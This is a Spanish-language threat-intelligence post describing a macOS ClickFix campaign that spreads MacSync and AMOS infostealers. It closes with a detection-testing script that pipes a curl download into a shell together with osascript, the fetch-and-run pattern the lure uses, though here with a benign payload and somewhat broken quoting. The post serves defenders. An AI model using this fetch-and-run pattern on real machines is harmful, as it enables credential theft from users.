SOC Prime Bias: Alto

10 Aug 2026 16:48 UTC

La campaña ClickFix de macOS evoluciona con puertas de infección camufladas

Author Photo
SOC Prime Team linkedin icon Seguir
La campaña ClickFix de macOS evoluciona con puertas de infección camufladas
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumen

Una campaña de macOS ClickFix está distribuyendo infostealers, incluyendo MacSync y Atomic Stealer (AMOS), a través de una puerta de huellas digitales del lado del servidor sofisticada. La operación utiliza dominios generados algorítmicamente y técnicas de huellas digitales de navegadores para asegurar que las cargas maliciosas solo se entreguen a usuarios genuinos de macOS, ayudando a evadir análisis de seguridad automatizados y rastreadores. Esta evolución marca un cambio de ingeniería social amplia hacia técnicas de entrega altamente dirigidas y ocultas.

Investigación

Microsoft Threat Intelligence rastreó un clúster de más de 250 dominios que compartían un patrón de nombres distintivo para descubrir la campaña. La investigación reveló una transición de entrega directa de señuelos a un proceso de dos etapas que involucra perfilado ligero de JavaScript. Al evaluar señales de WebGL, compensaciones de zona horaria y controles anti-análisis, los investigadores determinaron cómo la infraestructura dirige selectivamente a entornos macOS mientras presenta contenido señuelo benigno a solicitudes no calificadas.

Mitigación

Las organizaciones deben educar a los usuarios de que las actualizaciones legítimas de software no requieren pegar comandos en Terminal. Los equipos de seguridad deben monitorear actividad sospechosa en Terminal que incluya utilidades como curl, base64, gunzip, o osascript, particularmente cuando se activan después de navegar por la web. Fortalecer las protecciones en torno a los datos de Keychain y monitorear la archivación no autorizada de archivos sensibles también puede reducir el impacto de un compromiso exitoso.

Respuesta

Si se detecta ejecución sospechosa en Terminal o acceso no autorizado a almacenes de credenciales, los respondedores deben aislar inmediatamente el endpoint de macOS afectado. Investigue las conexiones salientes a dominios de baja reputación, con especial atención a /curl/ patrones de solicitud. Los hosts de preparación maliciosos identificados deben ser bloqueados, y el historial reciente de shell debe ser revisado en busca de ejecución de comandos codificados u ofuscados.

Flujo de Ataque

Ejecución de Simulación

Prerequisito: El Chequeo de Telemetría y Línea Base Pre-vuelo debe haber sido aprobado.

Justificación: Esta sección detalla la ejecución precisa de la técnica del adversario (TTP) diseñada para activar la regla de detección. Los comandos y la narrativa DEBEN reflejar directamente los TTPs identificados y buscar generar la telemetría exacta esperada por la lógica de detección. Los ejemplos abstractos o no relacionados conducirán a un diagnóstico erróneo.

  • Narrativa de Ataque y Comandos: El adversario inicia una campaña de ClickFix presentando un mensaje de error falso en un navegador web, instruyendo al usuario a «Arreglar el error» pegando un comando específico en el Terminal. El objetivo del atacante es establecer persistencia o descargar malware. El comando utiliza curl para extraer una carga útil maliciosa de AppleScript desde un servidor remoto y lo redirige a osascript -e para ejecutarlo inmediatamente en memoria, eludiendo el escaneo basado en archivos tradicional.

  • Script de Prueba de Regresión:

    # Simulación de ClickFix: Obtención de una carga útil y ejecución a través de osascript
    # Nota: Usamos un comando de eco benigno para simular la carga útil remota para evitar la infección real.
    
    curl -s https://raw.githubusercontent.com/example/payload/main/script.sh | zsh -c 'osascript -e "display dialog "Alerta de Seguridad: Se requiere actualización del sistema""'
    
    # Para asegurarnos de que la regla de detección se active, ejecutamos el patrón exacto:
    osascript -e 'say "Este es un ataque simulado"'
  • Comandos de Limpieza:

    # No se escriben archivos en el disco en esta ejecución específica de línea de comandos, 
    # pero nos aseguramos de que cualquier proceso en segundo plano sea terminado.
    killall osascript || true